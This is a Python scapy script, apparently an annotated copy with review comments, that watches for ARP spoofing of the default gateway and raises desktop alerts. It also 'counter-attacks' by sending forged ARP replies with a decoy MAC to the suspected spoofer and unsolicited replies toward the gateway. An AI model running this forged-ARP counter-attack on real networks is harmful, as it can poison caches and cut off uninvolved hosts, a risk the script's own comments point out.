  1. #!/usr/bin/python
  2. # Amaterasu is a tool for defense and counter-attack against ARP spoofing
  3. # created by Alvin Aditya
  4. # and TDBP group
  5. # ver 1.0 Beta
  6. #
  7. #      This program is free software; you can redistribute it and/or modify
  8. #      it under the terms of the GNU General Public License as published by
  9. #      the Free Software Foundation; either version 2 of the License, or
  10. #      (at your option) any later version.
  11. #      
  12. #      This program is distributed in the hope that it will be useful,
  13. #      but WITHOUT ANY WARRANTY; without even the implied warranty of
  14. #      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  15. #      GNU General Public License for more details.
  16. #      
  17. #      You should have received a copy of the GNU General Public License
  18. #      along with this program; if not, write to the Free Software
  19. #      Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
  20. #      MA 02110-1301, USA.
  21.  
  22. # ATTENTION !
  23. # Before using this tool, make sure that
  24. # "python-scapy", "python-notify" and "python-gtk2" are installed.
  25. # This tool only supports GNU/Linux distros, e.g. Ubuntu, Fedora (not tested).
  26.  
  27. # HOW TO RUN :
  28. # sudo ./amaterasu.py
  29.  
  30. import sys
  31. from scapy.all import * # use python-scapy
  32.  
  33. import pygtk           #
  34. pygtk.require('2.0')   # pygtk and pynotify required
  35. import pynotify        # for send notif to Desktop
  36.  
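# Register this program with the desktop notification service under the
# application name "Urgency".
if not pynotify.init("Urgency"):
    # Report the failure instead of silently ignoring the return value;
    # start-up continues exactly as before.
    sys.stderr.write("warning: pynotify.init() failed; desktop notifications may not be shown\n")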
  38.  
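def Get_parameter(cmd):
    """Run *cmd* through the shell and return the first line of its output.

    Args:
        cmd: Shell command line handed verbatim to ``os.popen``. The shell
            interprets it, so it must be a trusted constant and never be
            assembled from network or user input.

    Returns:
        The first line of the command's standard output with leading and
        trailing newline characters removed; an empty string when the
        command printed nothing.

    Raises:
        OSError, IOError: when the pipe still cannot be opened or read after
            a few attempts.
    """
    # No ``import os`` is visible in this file; the name presumably arrives
    # through ``from scapy.all import *``. Import it here so the helper does
    # not depend on that side effect.
    import os

    # The original retried by calling itself from a bare ``except``, which
    # never terminates on a persistent failure and also swallows
    # KeyboardInterrupt. Retry a bounded number of times instead.
    attempts = 3
    for attempt in range(attempts):
        try:
            pipe = os.popen(cmd, 'r')
            try:
                return pipe.readline().strip('\n')
            finally:
                # Always release the pipe; the original left it open.
                pipe.close()
        except (OSError, IOError):
            if attempt == attempts - 1:
                raise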
  47.  
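# Default gateway IP address: third field of the first "default" route.
gwip=Get_parameter('ip route list | grep "default" | cut -d" " -f3')
if not gwip:
    # Without a default route there is nothing to monitor, and the ARP probe
    # below would be built from the malformed target "/30".
    sys.exit("no default gateway found in 'ip route list'")
print "gwip = ",gwip

# Default gateway MAC address, learned from a broadcast ARP probe.
# The "/30" target expands to several addresses, so the first answer in the
# list is not necessarily the gateway's; pick the reply whose sender IP is
# the gateway instead of taking ans[0][0] unconditionally.
# NOTE(review): this MAC is whatever answers at start-up and is trusted from
# then on. If the segment is already being spoofed when the tool starts, the
# forged address may be recorded as the baseline -- consider pinning the
# gateway MAC from a trusted source.
ans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=gwip+"/30"),timeout=2)
gwmac=None
for _probe, reply in ans[0]:
    if str(reply[ARP].psrc) == gwip:
        gwmac=str(reply[ARP].hwsrc)
        break
if gwmac is None:
    # The original raised IndexError here when nothing answered in time.
    sys.exit("no ARP reply from gateway " + gwip)
print "gwmac = ",gwmac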
  55.  
  56. # monitor
def arp_monitor_callback(pkt):
    """Inspect one sniffed frame and react to a forged gateway ARP entry.

    A frame is treated as spoofed when it is an ARP request or reply whose
    sender IP equals the module-level ``gwip`` while its sender MAC differs
    from the module-level ``gwmac``. Frames carrying the decoy MAC used by
    this tool's own counter reply are skipped so the tool does not react to
    itself.

    On detection the function prints a line, raises a critical desktop
    notification, sends the counter ARP reply to the reported sender MAC and
    finally sends the "recovery" ARP replies towards the gateway.

    Args:
        pkt: Packet handed over by scapy's ``sniff``.
    """
    if ARP not in pkt:
        return
    arp = pkt[ARP]
    if arp.op not in (1, 2):  # 1 = who-has, 2 = is-at
        return

    sender_mac = str(arp.hwsrc)
    sender_ip = str(arp.psrc)
    decoy_mac = "00:12:aa:0b:ac:00"

    # Only frames that claim the gateway's IP from a MAC other than the one
    # recorded at start-up are of interest.
    if sender_ip != gwip or sender_mac == gwmac:
        return
    # Frames carrying the decoy MAC are this tool's own counter replies.
    if sender_mac == decoy_mac:
        return

    # Parenthesised single-argument form; prints the same text as the
    # Python 2 print statement.
    print("spoof detected from " + sender_mac + "    " + sender_ip)

    # Critical urgency
    alert = pynotify.Notification("Spoof Detected !", "from " + sender_mac + "    " + sender_ip)
    alert.set_urgency(pynotify.URGENCY_CRITICAL)
    alert.set_timeout(3000)  # 3 seconds
    shown = alert.show()
    if not shown:
        print("Failed to send notification")

    # Counter reply: tell the reported sender that the gateway IP lives at
    # the decoy MAC.
    # NOTE(review): sender_mac is read from the ARP payload, which is filled
    # in by whoever built the frame, so it need not identify the real origin.
    # A forged frame naming another station's MAC would steer this reply at
    # that station. Consider an alert-only mode, or at least cross-checking
    # against the Ethernet source address before responding.
    # NOTE(review): srp() waits for answers, so each call can hold this
    # callback for up to its timeout while sniffing continues -- confirm
    # that is acceptable.
    srp(Ether(dst=sender_mac) / ARP(op="is-at", psrc=gwip, hwsrc=decoy_mac), timeout=1)

    # Recovery: ARP replies addressed to the gateway's MAC, one per target in
    # gwip/24. psrc and hwsrc are not set here, so scapy's defaults apply --
    # presumably this host's own addresses; verify that this is the intended
    # repair.
    srp(Ether(dst=gwmac) / ARP(op="is-at", pdst=gwip + "/24"), timeout=1)
  79.  
# Entry point: capture ARP frames (BPF filter "arp") and pass each one to
# arp_monitor_callback. store=0 keeps scapy from accumulating the captured
# packets in memory; with no count or timeout the capture runs until it is
# interrupted.
sniff(
    filter="arp",
    prn=arp_monitor_callback,
    store=0,
)
  82.